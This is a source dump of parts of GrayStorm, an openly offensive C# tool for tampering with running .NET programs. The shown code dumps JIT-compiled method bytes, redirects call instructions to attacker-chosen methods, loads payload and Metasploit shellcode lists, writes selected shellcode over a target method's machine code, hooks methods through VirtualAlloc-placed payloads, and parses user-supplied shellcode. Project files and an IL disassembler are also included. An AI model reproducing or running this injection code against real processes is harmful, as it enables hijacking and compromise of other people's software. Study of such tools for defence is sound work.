                    currentMethod = new StorageInformation();
                    currentMethod.memory = memory;
                    currentMethod.methodSignature = domainTraverser.currentMethod;
                    currentMethod.dumped = true;
                    currentMethod.methodIntPtr = trueIntPtr;
                    // Same array instance as memory, not a copy. Re-dumps assign a fresh array to .memory,
                    // so this reference keeps the original bytes — but in-place mutation of either would alter both.
                    currentMethod.oldMethod = currentMethod.memory;
                    currentMethod.methodDelegate = targetMethodDelegate;
                    methodHelpers.StorageInformationArrayList.Add(currentMethod);
                    containedIndex = methodHelpers.StorageInformationArrayList.Count - 1;
                    grayStorm._addrOfMethod_TB.Text = methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr.ToString("X");
                }
            }
        }

        if (disassemble_CB.Checked)
        {
            beaEngine.disassemble disasm = new beaEngine.disassemble();
            disasm.disassembler(methodHelpers.StorageInformationArrayList[containedIndex].memory, this.editor_RTB, methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
        }
        else
        {
            foreach (byte b in methodHelpers.StorageInformationArrayList[containedIndex].memory)
            {
                editor_RTB.AppendText(String.Format("0x{0:X2}\n", b));
            }
        }
    }

    /// <summary>
    /// Lists the IL of domainTraverser.currentMethod in editor_RTB, one instruction per line as
    /// "OFFSET OPCODE OPERAND". Does nothing when no method is selected.
    /// </summary>
    public void getIL_BT_Click(object sender, EventArgs e)
    {
        if (domainTraverser.currentMethod == null)
            return;
        editor_RTB.Clear();
        formatOutput formatOutput = new formatOutput();
        foreach (ILInstruction instruciton in ILInstructionLoader.GetInstructions(domainTraverser.currentMethod))
        {
            editor_RTB.AppendText(instruciton.Offset.ToString("X4") + " " + instruciton.OpCode + " " + formatOutput.setUpDataFormat(instruciton) + "\n");
        }
    }

    /// <summary>
    /// Context-menu action on dynamicMethods_LB: invokes the selected user-written method through its
    /// function pointer (methodInvoking.fireMethod mode 0).
    /// </summary>
    private void fireMethodToolStripMenuItem_Click(object sender, EventArgs e)
    {
        if (dynamicMethods_LB.SelectedItem != null)
        {
            // NOTE(review): the "as" cast is not null-checked; a non-MethodInfo list item would throw here.
            MethodInfo customMethod = dynamicMethods_LB.SelectedItem as MethodInfo;
            methodInvoking.fireMethod(customMethod.MethodHandle.GetFunctionPointer(), 0);
        }
    }

    /// <summary>
    /// Context-menu action on editor_RTB: retargets the call at the current editor position to the
    /// selected user-written method (indirect, 0xFF form; see assemblyControlFlow.replaceDwordCall).
    /// getAddressForFire returns IntPtr.Zero when nothing is selected — that value is passed through unchecked.
    /// </summary>
    private void changeCallAddressFromCuscomC0xFFToolStripMenuItem_Click(object sender, EventArgs e)
    {
        IntPtr cSharpIntPtr = getAddressForFire();
        assemblyControlFlow.replaceDwordCall(cSharpIntPtr);
    }

    /// <summary>
    /// Same as the 0xFF variant but for the relative (0xE8) call form; see assemblyControlFlow.replaceE8Call.
    /// IntPtr.Zero from getAddressForFire is passed through unchecked.
    /// </summary>
    private void changeCallAddressFromCuscomC0xE8ToolStripMenuItem_Click(object sender, EventArgs e)
    {
        IntPtr cSharpIntPtr = getAddressForFire();
        assemblyControlFlow.replaceE8Call(cSharpIntPtr);
    }

    /// <summary>
    /// Like the custom-C# variant, but the target is the cache entry remembered in
    /// hierarchyViewer.savedCachePtr; does nothing while that is -1.
    /// </summary>
    private void changeCallAddressFromCachedMethod0xFFToolStripMenuItem_Click(object sender, EventArgs e)
    {
        if (hierarchyViewer.savedCachePtr == -1)
            return;
        assemblyControlFlow.replaceDwordCall(methodHelpers.StorageInformationArrayList[hierarchyViewer.savedCachePtr].methodIntPtr);
    }

    /// <summary>
    /// Like the custom-C# 0xE8 variant, but the target is the cache entry remembered in
    /// hierarchyViewer.savedCachePtr; does nothing while that is -1.
    /// </summary>
    private void changeCallAddressFromCachedMethod0xE8ToolStripMenuItem_Click(object sender, EventArgs e)
    {
        if (hierarchyViewer.savedCachePtr == -1)
            return;
        assemblyControlFlow.replaceE8Call(methodHelpers.StorageInformationArrayList[hierarchyViewer.savedCachePtr].methodIntPtr);
    }

    /// <summary>
    /// Context-menu action on dynamicMethods_LB: lists the IL of the selected user-written method in
    /// editor_RTB, in the same format as getIL_BT_Click.
    /// </summary>
    private void getILCustomCToolStripMenuItem_Click(object sender, EventArgs e)
    {
        var selectedMethod = dynamicMethods_LB.SelectedItem as MethodInfo;
        if (selectedMethod == null)
            return;
        editor_RTB.Clear();
        formatOutput formatOutput = new formatOutput();
        foreach (ILInstruction instruciton in ILInstructionLoader.GetInstructions(selectedMethod))
        {
            editor_RTB.AppendText(instruciton.Offset.ToString("X4") + " " + instruciton.OpCode + " " + formatOutput.setUpDataFormat(instruciton) + "\n");
        }
    }


    /// <summary>
    /// Context-menu action on dynamicMethods_LB: JIT-prepares the selected user-written method and
    /// prints the bytes read from a function pointer as "0xNN" lines (never disassembled, never cached).
    /// </summary>
    private void dumpAssemblyCustomCToolStripMenuItem_Click(object sender, EventArgs e)
    {
        var selectedMethod = dynamicMethods_LB.SelectedItem as MethodInfo;
        methodInvoking invokeMethods = new methodInvoking();
        byte[] memory;
        if (selectedMethod != null)
        {
            System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(selectedMethod.MethodHandle); //JIT the method!
            // NOTE(review): the delegate is built from domainTraverser.currentMethod although the method
            // just prepared is selectedMethod (compare getAddressForFire, which uses selectedMethod). This
            // looks like the wrong target — the bytes shown would be the hierarchy-selected method's, and
            // the call throws if nothing is selected there. TODO confirm.
            Delegate targetMethodDelegate = invokeMethods.getMethodDelegate(domainTraverser.currentMethod); //Get the Delegate of the method.
            IntPtr trueIntPtr = invokeMethods.getIntPtrFromDelegate(targetMethodDelegate);
            memory = assemblyHelpers.DumpAFunction(trueIntPtr);
            if (memory == null)
            {
                editor_RTB.AppendText(String.Format("COULD NOT READ MEMORY\n"));
                return;
            }
            else
            {
                foreach (byte b in memory)
                {
                    editor_RTB.AppendText(String.Format("0x{0:X2}\n", b));
                }
            }
        }
    }
    #endregion buttons

    #region helpers
    /// <summary>Turns the disassemble checkbox on (used by hierarchyViewer before it triggers a dump).</summary>
    public void setDisassembleChecked()
    {
        disassemble_CB.Checked = true;
    }

    /// <summary>Turns the disassemble checkbox off (used by hierarchyViewer before it triggers a dump).</summary>
    public void setDisassembleUnchecked()
    {
        disassemble_CB.Checked = false;
    }

    /// <summary>
    /// Resolves the function pointer of the user-written method selected in dynamicMethods_LB by
    /// creating a delegate for it (methodInvoking.getMethodDelegate / getIntPtrFromDelegate).
    /// </summary>
    /// <returns>The pointer, or IntPtr.Zero when no MethodInfo is selected.</returns>
    private IntPtr getAddressForFire()
    {
        var selectedMethod = dynamicMethods_LB.SelectedItem as MethodInfo;
        if (selectedMethod == null)
            return IntPtr.Zero;
        IntPtr trueIntPtr = IntPtr.Zero;
        Delegate targetMethodDelegate = null;
        methodInvoking invokeMethods = new methodInvoking();
        targetMethodDelegate = invokeMethods.getMethodDelegate(selectedMethod); //Get the Delegate of the method.
        trueIntPtr = invokeMethods.getIntPtrFromDelegate(targetMethodDelegate);
        return trueIntPtr;
    }
    #endregion helpers
}
207 | }
208 |
209 |
--------------------------------------------------------------------------------
/GUI/memoryHijacker.resx:
--------------------------------------------------------------------------------
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 | 172, 17
122 |
123 |
124 | 17, 17
125 |
126 |
--------------------------------------------------------------------------------
/GUI/shellcode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Drawing;
5 | using System.Data;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Windows.Forms;
9 | using System.Reflection;
10 |
11 | namespace GrayStorm
12 | {
13 | public partial class shellcode : UserControl
14 | {
15 | #region init
// The payload currently shown in shellcode_RTB; set by displayPayload from whichever list box was
// last selected, and read by fireShellcode_BT_Click / hookTargetMethod. Null when the selected item
// is not a dataBox.
GrayStorm.dataBox payload;
17 |
/// <summary>Creates the control; the list boxes stay empty until loadShellcode is called.</summary>
public shellcode()
{
    InitializeComponent();
}
22 |
/// <summary>
/// Fills the two list boxes from the static catalogue in shellcodes.payloads:
/// payloads_LB from payloadsList() and metaSploit_LB from metaSploitList().
/// </summary>
public void loadShellcode()
{
    foreach (var entry in GrayStorm.shellcodes.payloads.payloadsList())
    {
        payloads_LB.Items.Add(entry);
    }

    foreach (var entry in GrayStorm.shellcodes.payloads.metaSploitList())
    {
        metaSploit_LB.Items.Add(entry);
    }
}
31 | #endregion init
32 |
33 | #region listBox selecting
/// <summary>
/// Shows the item picked in payloads_LB and clears metaSploit_LB's selection so at most one list has
/// a selection (the cleared list's handler returns early on index -1). Ignored when this list's own
/// selection was just cleared.
/// </summary>
private void payloads_LB_SelectedIndexChanged(object sender, EventArgs e)
{
    bool hasSelection = payloads_LB.SelectedIndex != -1;
    if (hasSelection)
    {
        displayPayload(payloads_LB.SelectedItem);
        metaSploit_LB.SelectedIndex = -1;
    }
}
42 |
/// <summary>
/// Shows the item picked in metaSploit_LB and clears payloads_LB's selection so at most one list has
/// a selection (the cleared list's handler returns early on index -1). Ignored when this list's own
/// selection was just cleared.
/// </summary>
private void metaSploit_LB_SelectedIndexChanged(object sender, EventArgs e)
{
    bool hasSelection = metaSploit_LB.SelectedIndex != -1;
    if (hasSelection)
    {
        displayPayload(metaSploit_LB.SelectedItem);
        payloads_LB.SelectedIndex = -1;
    }
}
51 |
/// <summary>
/// Stores <paramref name="shellcode"/> in the payload field and renders its bytes in shellcode_RTB,
/// either as beaEngine disassembly (disassemble_CB checked) or as one "0xNN" line per byte.
/// Items that are not a dataBox clear the text box and leave payload null.
/// </summary>
/// <param name="shellcode">The selected list-box item; expected to be a GrayStorm.dataBox.</param>
private void displayPayload(object shellcode)
{
    shellcode_RTB.Clear();
    payload = shellcode as GrayStorm.dataBox;
    if (shellcode is GrayStorm.dataBox)   // equivalent to payload != null after the cast above
    {
        if (disassemble_CB.Checked)
        {
            beaEngine.disassemble disasm = new beaEngine.disassemble();
            unsafe
            {
                // Pin the byte array for the duration of the disassembly so the GC cannot move it, and
                // hand its address to the disassembler as the base offset shown in the listing.
                fixed (byte* pointer = payload.data)
                {
                    IntPtr offset = (IntPtr)pointer;
                    disasm.disassembler(payload.data, this.shellcode_RTB, offset);
                }
            }
        }
        else
        {
            foreach (byte opcode in payload.data)
            {
                shellcode_RTB.AppendText(String.Format("0x{0:X2}\n", opcode));

            }
        }
    }
}
81 | #endregion listBox selecting
82 |
83 | #region inject shellcode
/// <summary>
/// "Fire shellcode" button: writes the displayed payload over the code of the method currently selected
/// in the hierarchy viewer, which must already have a cache entry in methodHelpers.StorageInformationArrayList.
/// With hookMethod_CB checked the platform-specific hook path is used instead (hookTargetMethod on 32-bit;
/// hookTargetMethod64 on 64-bit, which is unimplemented); otherwise the bytes are written directly after
/// a confirmation when the payload is not shorter than the original code.
/// </summary>
private void fireShellcode_BT_Click(object sender, EventArgs e)
{
    if (metaSploit_LB.SelectedIndex != -1 || payloads_LB.SelectedIndex != -1)
    {
        // NOTE(review): payload is null when the selected item was not a dataBox (see displayPayload);
        // this dereference is outside the try below and would throw unhandled.
        GrayStorm.assemblyHelpers.holder = payload.data;
    }
    else
        return;

    int containedIndex = methodHelpers.containedInList(GrayStorm.domainTraverser.currentMethod);
    if (containedIndex == -1)
        return;

    // Force the next dump to re-read the method's bytes rather than show the cached ones.
    methodHelpers.StorageInformationArrayList[containedIndex].dumped = false;

    if (hookMethod_CB.Checked && IntPtr.Size == 4)
        hookTargetMethod(containedIndex);
    else if (hookMethod_CB.Checked && IntPtr.Size == 8)
        hookTargetMethod64(containedIndex);
    else
    {
        try
        {
            DialogResult dialogResult = DialogResult.Yes;
            // ">=" means an exactly equal length also triggers the warning; presumably intentional. TODO confirm.
            if (payload.data.Length >= methodHelpers.StorageInformationArrayList[containedIndex].oldMethod.Length)
            {
                dialogResult = MessageBox.Show("Length of shellcode is longer than the origional memory... Continue?", "Warning", MessageBoxButtons.YesNo);
            }
            if (dialogResult == DialogResult.Yes)
            {
                // writeAMethod appears to take its source bytes from assemblyHelpers.holder, assigned above.
                methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
            }
        }
        catch (Exception ex) { System.Windows.Forms.MessageBox.Show(ex.ToString()); }
    }
}
120 |
/// <summary>
/// 32-bit "hook" path of fireShellcode_BT_Click. Delegates the byte-level work to CToAsmAttackChain
/// (payloadCleaner / newPrelude) and methodHijacking.writeAMethod; this method only sequences those calls
/// and the shared assemblyHelpers.holder buffer they read from. The callback that later restores the
/// original method is returnOldMethod.
/// </summary>
/// <param name="containedIndex">Index of the target method's entry in methodHelpers.StorageInformationArrayList.</param>
private void hookTargetMethod(int containedIndex)
{
    int indexToStartCleaning = payload.indexToStartCleaning;

    // A payload without an indexToStartCleaning cannot be used on this path (0 is the "unsupported" marker).
    if (indexToStartCleaning == 0)
    {
        System.Windows.Forms.MessageBox.Show("Payload doesn't support hooking");
        return;
    }
    // Looked up by name: returnOldMethod must stay public static for this to resolve (GetMethod would return null otherwise).
    MethodInfo safeCall = typeof(shellcode).GetMethod("returnOldMethod", BindingFlags.Public | BindingFlags.Static);
    IntPtr safeCallPtr = (IntPtr)safeCall.MethodHandle.GetFunctionPointer().ToInt64();   // the ToInt64 round-trip is a no-op on 32-bit

    // Order matters: payloadCleaner is expected to modify assemblyHelpers.holder in place before it is
    // copied, and holder is reassigned again before writeAMethod — TODO confirm against CToAsmAttackChain.
    CToAsmAttackChain.payloadCleaner(containedIndex, safeCallPtr, indexToStartCleaning);
    IntPtr payloadAddress = assemblyHelpers.VirtualAlloc(GrayStorm.assemblyHelpers.holder);
    System.Runtime.InteropServices.Marshal.Copy(GrayStorm.assemblyHelpers.holder, 0, payloadAddress, GrayStorm.assemblyHelpers.holder.Length);

    byte[] newMemory = CToAsmAttackChain.newPrelude(payloadAddress);
    GrayStorm.assemblyHelpers.holder = newMemory;
    methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
}
142 |
/// <summary>
/// Callback reached from the hook set up by hookTargetMethod (its address is resolved there by name).
/// Writes the target method's original bytes (oldMethod) back over its code and then invokes the
/// method's stored delegate once, ignoring any failure of that invocation.
/// </summary>
/// <param name="somePtr">Not used by the body; presumably required by the calling convention of the hook — TODO confirm.</param>
/// <param name="selectedIndex">Index of the target method's entry in methodHelpers.StorageInformationArrayList.</param>
public static void returnOldMethod(int somePtr, int selectedIndex)
{
    GrayStorm.assemblyHelpers.holder = methodHelpers.StorageInformationArrayList[selectedIndex].oldMethod;
    methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[selectedIndex].methodIntPtr);
    try
    {

        methodHelpers.StorageInformationArrayList[selectedIndex].methodDelegate.DynamicInvoke(null, new object[] { });
    }
    catch { }   // best effort: the restore above has already happened, so a failing re-invocation is ignored
}
155 |
156 | //TODO
// TODO: 64-bit hooking is not implemented. The body is entirely commented out, so calling this
// is a no-op. The sketch below mirrors hookTargetMethod with the *64 helper variants, but it
// refers to identifiers the live code does not use (shellcodeGUI, memoryHijacker.assemblyHelpers),
// so it is not a drop-in.
private void hookTargetMethod64(int containedIndex)
{
    //int indexToStartCleaning = payload.indexToStartCleaning;
    ////payload cannot be used with this attack chain if there is no proper index to store reset assembly.
    //if (indexToStartCleaning == 0)
    //{
    // System.Windows.Forms.MessageBox.Show("Payload doesn't support hooking");
    // return;
    //}

    //MethodInfo safeCall = typeof(shellcodeGUI).GetMethod("returnOldMethod", BindingFlags.NonPublic | BindingFlags.Instance);
    //IntPtr safeCallPtr = (IntPtr)safeCall.MethodHandle.GetFunctionPointer().ToInt64();

    //CToAsmAttackChain.payloadCleaner64(containedIndex, safeCallPtr, indexToStartCleaning);
    //IntPtr payloadAddress = assemblyHelpers.VirtualAlloc(memoryHijacker.assemblyHelpers.holder);
    //System.Runtime.InteropServices.Marshal.Copy(memoryHijacker.assemblyHelpers.holder, 0, payloadAddress, memoryHijacker.assemblyHelpers.holder.Length);

    //byte[] newMemory = CToAsmAttackChain.newPrelude64(payloadAddress);
    //GrayStorm.assemblyHelpers.holder = newMemory;
    //methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
}
178 |
179 |
180 |
181 | #endregion inject shellcode
182 |
183 | #region restore code
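/// <summary>
/// Puts the saved original bytes of the currently selected method back in place, undoing an
/// earlier overwrite, and clears its "dumped" flag.
/// </summary>
/// <param name="sender">Unused.</param>
/// <param name="e">Unused.</param>
private void restoreCode_BT_Click(object sender, EventArgs e)
{
    // Nothing to restore if the current method was never saved.
    int containedIndex = GrayStorm.methodHelpers.containedInList(domainTraverser.currentMethod);
    if (containedIndex == -1)
        return;
    try
    {
        GrayStorm.assemblyHelpers.holder = methodHelpers.StorageInformationArrayList[containedIndex].oldMethod;
        methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
        methodHelpers.StorageInformationArrayList[containedIndex].dumped = false;
    }
    catch (Exception ex)
    {
        // Report the failure instead of swallowing it, matching the inject handler's error reporting.
        System.Windows.Forms.MessageBox.Show(ex.ToString());
    }
}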
198 | #endregion restore code
199 |
200 | #region newShellcode
/// <summary>
/// Parses the hex text in createShellcode_RTB into bytes and adds it, with the name and hook
/// offset from the text boxes, to whichever payload list currently has no selection.
/// </summary>
/// <param name="sender">Unused.</param>
/// <param name="e">Unused.</param>
private void createShellcode_BT_Click(object sender, EventArgs e)
{
    byte[] shellcode;
    string insertedShellcode = createShellcode_RTB.Text;
    bool metaSploit = false;
    int offset = 0;
    shellcode_RTB.Clear();
    // Accept "\x##", "0x##" and bare "##" forms: strip the prefixes and separators, then drop
    // every remaining non-word character so only the hex digits are left.
    insertedShellcode = insertedShellcode.Replace("\\x", string.Empty);
    insertedShellcode = insertedShellcode.Replace("0x", string.Empty);
    insertedShellcode = insertedShellcode.Replace(", ", string.Empty);
    insertedShellcode = insertedShellcode.Replace("\n", string.Empty);
    insertedShellcode = System.Text.RegularExpressions.Regex.Replace(insertedShellcode, @"\W+", "");
    // Sized to the character count, i.e. twice the byte count; the unused upper half stays zero
    // and is removed by the trailing-zero trim below.
    shellcode = new byte[insertedShellcode.Length];

    try
    {
        // Two hex characters per byte. An odd-length string makes Substring throw, and a non-hex
        // character makes Convert.ToByte throw; both land in the catch below.
        for (int i = 0; i < insertedShellcode.Length; i += 2)
            shellcode[i / 2] = Convert.ToByte(insertedShellcode.Substring(i, 2), 16);
        // Destination list is the one without a selection. With neither list selected the
        // handler returns silently — no message is shown.
        if (payloads_LB.SelectedIndex == -1 && metaSploit_LB.SelectedIndex == -1)
            return;
        else if (payloads_LB.SelectedIndex == -1)
            metaSploit = true;
        else
            metaSploit = false;

        // Remove trailing 0's. NOTE: this also strips any genuine 0x00 bytes at the end of the
        // entered payload, not just the unused half of the buffer.
        int lastIndex = Array.FindLastIndex(shellcode, b => b != 0);
        Array.Resize(ref shellcode, lastIndex + 1);
    }
    catch
    {
        shellcode_RTB.AppendText("Invalid shellcode detected. Only use shellcode in the form of \n\"\\x##\" \n\"0x##\" \n##\n Shellcode must have 0x##, assembler does not support 0x# operands");
        return;
    }

    try
    {
        // Culture-sensitive parse; -1 is the documented "no hook offset" value.
        offset = Convert.ToInt32(hookOffset_TB.Text);
    }
    catch
    {
        shellcode_RTB.AppendText("Payload hook offset not in the correct format.\n Please make it a value. -1 means there is none");
        return;
    }

    dataBox newPayload = new dataBox(payloadName_TB.Text, shellcode, offset);

    if (metaSploit)
    {
        metaSploit_LB.Items.Add(newPayload);
    }
    else
        payloads_LB.Items.Add(newPayload);
}
255 | #endregion newShellcode
256 | }
257 | }
258 |
--------------------------------------------------------------------------------
/GUI/shellcode.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 | True
122 |
123 |
--------------------------------------------------------------------------------
/GrayStorm.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}
8 | WinExe
9 | Properties
10 | GrayStorm
11 | GrayStorm
12 | v3.5
13 | 512
14 |
15 |
16 | x86
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 | true
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | false
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 | true
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 | UserControl
60 |
61 |
62 | cSharpMethodWriter.cs
63 |
64 |
65 | UserControl
66 |
67 |
68 | memoryHijacker.cs
69 |
70 |
71 | UserControl
72 |
73 |
74 | MethodEditor.cs
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 | Form
85 |
86 |
87 | GrayStorm.cs
88 |
89 |
90 | UserControl
91 |
92 |
93 | hierarchyViewer.cs
94 |
95 |
96 | UserControl
97 |
98 |
99 | shellcode.cs
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 | cSharpMethodWriter.cs
114 |
115 |
116 | GrayStorm.cs
117 |
118 |
119 | hierarchyViewer.cs
120 |
121 |
122 | memoryHijacker.cs
123 |
124 |
125 | MethodEditor.cs
126 |
127 |
128 | shellcode.cs
129 |
130 |
131 |
132 |
133 |
134 |
135 |
142 |
--------------------------------------------------------------------------------
/GrayStorm.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2013
4 | VisualStudioVersion = 12.0.21005.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GrayStorm", "GrayStorm.csproj", "{56F35D53-1BD9-4B60-9A90-D65B3F897BCF}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|Mixed Platforms = Debug|Mixed Platforms
12 | Debug|Win32 = Debug|Win32
13 | Debug|x64 = Debug|x64
14 | Release|Any CPU = Release|Any CPU
15 | Release|Mixed Platforms = Release|Mixed Platforms
16 | Release|Win32 = Release|Win32
17 | Release|x64 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
20 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
21 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|Any CPU.Build.0 = Debug|Any CPU
22 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|Mixed Platforms.ActiveCfg = Debug|Any CPU
23 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|Mixed Platforms.Build.0 = Debug|Any CPU
24 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|Win32.ActiveCfg = Debug|Any CPU
25 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|x64.ActiveCfg = Debug|Any CPU
26 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|Any CPU.ActiveCfg = Release|Any CPU
27 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|Any CPU.Build.0 = Release|Any CPU
28 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|Mixed Platforms.ActiveCfg = Release|Any CPU
29 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|Mixed Platforms.Build.0 = Release|Any CPU
30 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|Win32.ActiveCfg = Release|Any CPU
31 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|x64.ActiveCfg = Release|Any CPU
32 | EndGlobalSection
33 | GlobalSection(SolutionProperties) = preSolution
34 | HideSolutionNode = FALSE
35 | EndGlobalSection
36 | EndGlobal
37 |
--------------------------------------------------------------------------------
/IL Disasm/ByteArrayExtensions.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 |
7 | namespace GrayStorm
8 | {
public static class ByteArrayExtensions
{
    /// <summary>
    /// Reads a little-endian 32-bit integer from <paramref name="bytes"/> starting at <paramref name="index"/>.
    /// </summary>
    /// <param name="bytes">Source buffer; must hold at least four bytes from <paramref name="index"/>.</param>
    /// <param name="index">Position of the least significant byte.</param>
    /// <returns>The assembled value; the top bit of the fourth byte becomes the sign bit.</returns>
    /// <exception cref="IndexOutOfRangeException">Fewer than four bytes remain at <paramref name="index"/>.</exception>
    public static int GetInt32(this byte[] bytes, int index)
    {
        int value = 0;
        // Fold from the most significant byte down so each step is a shift-and-or.
        for (int i = 3; i >= 0; i--)
        {
            value = (value << 8) | bytes[index + i];
        }
        return value;
    }
}
20 | }
21 |
--------------------------------------------------------------------------------
/IL Disasm/ILCode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Reflection;
4 | using System.Reflection.Emit;
5 |
6 |
7 | namespace GrayStorm
8 | {
public static class ILInstructionLoader
{
    /// <summary>
    /// Lazily decodes the IL stream of <paramref name="methodBase"/> into one
    /// <see cref="ILInstruction"/> per opcode, advancing past each operand by its encoded size.
    /// </summary>
    /// <param name="methodBase">Method whose body is read; a method with no body yields nothing.</param>
    /// <returns>Instructions in stream order. Only method-call operands are resolved into <c>Data</c>.</returns>
    /// <exception cref="NotImplementedException">An operand type the switch does not know.</exception>
    public static IEnumerable GetInstructions(MethodBase methodBase)
    {
        MethodBody body = methodBase.GetMethodBody();
        byte[] il = body == null ? new byte[] { } : body.GetILAsByteArray();

        int pos = 0;
        while (pos < il.Length)
        {
            ILInstruction decoded = new ILInstruction { Offset = pos };

            // One-byte opcode, or a two-byte opcode introduced by the 0xFE prefix.
            short code = il[pos++];
            if (code == 0xfe)
            {
                code = (short)(il[pos++] | 0xfe00);
            }
            decoded.OpCode = ILOpCodeTranslator.GetOpCode(code);

            switch (decoded.OpCode.OperandType)
            {
                case OperandType.InlineMethod:
                    // Metadata token resolved in the context of the declaring type's (and, for
                    // generic methods, the method's own) type arguments.
                    int token = il.GetInt32(pos);
                    Type[] methodGenerics = methodBase.IsGenericMethod ? methodBase.GetGenericArguments() : null;
                    decoded.Data = methodBase.Module.ResolveMethod(token, methodBase.DeclaringType.GetGenericArguments(), methodGenerics);
                    pos += 4;
                    break;

                case OperandType.InlineSwitch:
                    // A 4-byte count followed by that many 4-byte jump targets.
                    pos += 4 * (il.GetInt32(pos) + 1);
                    break;

                case OperandType.InlineNone:
                    break;

                case OperandType.InlineI8:
                case OperandType.InlineR:
                    pos += 8;
                    break;

                case OperandType.InlineBrTarget:
                case OperandType.InlineField:
                case OperandType.InlineI:
                case OperandType.InlineSig:
                case OperandType.InlineString:
                case OperandType.InlineTok:
                case OperandType.InlineType:
                case OperandType.ShortInlineR:
                    pos += 4;
                    break;

                case OperandType.InlineVar:
                    pos += 2;
                    break;

                case OperandType.ShortInlineBrTarget:
                case OperandType.ShortInlineI:
                case OperandType.ShortInlineVar:
                    pos += 1;
                    break;

                default:
                    throw new NotImplementedException();
            }

            yield return decoded;
        }
    }
}
128 | }
129 |
--------------------------------------------------------------------------------
/IL Disasm/ILInstruction.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Reflection;
3 | using System.Reflection.Emit;
4 |
5 | namespace GrayStorm
6 | {
public sealed class ILInstruction
{
    /// <summary>Byte offset of this instruction within the method's IL stream.</summary>
    public int Offset { get; set; }

    /// <summary>The decoded opcode.</summary>
    public OpCode OpCode { get; set; }

    /// <summary>
    /// Operand attached by the loader, if any (the IL loader sets this for method-call operands);
    /// null otherwise.
    /// </summary>
    public object Data { get; set; }
}
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/IL Disasm/ILOpCodeTranslator.cs:
--------------------------------------------------------------------------------
1 | using System.Collections.Generic;
2 | using System.Reflection;
3 | using System.Reflection.Emit;
4 |
5 | namespace GrayStorm
6 | {
internal static class ILOpCodeTranslator
{
    // Keyed by OpCode.Value (the one- or two-byte encoding). Built once, on first use of the type.
    private static readonly Dictionary<short, OpCode> _opCodes = BuildTable();

    /// <summary>Returns the <see cref="OpCode"/> whose encoded value is <paramref name="value"/>.</summary>
    /// <param name="value">Encoded opcode; two-byte opcodes carry the 0xFE prefix in the high byte.</param>
    /// <exception cref="KeyNotFoundException">No opcode has that value.</exception>
    public static OpCode GetOpCode(short value)
    {
        return _opCodes[value];
    }

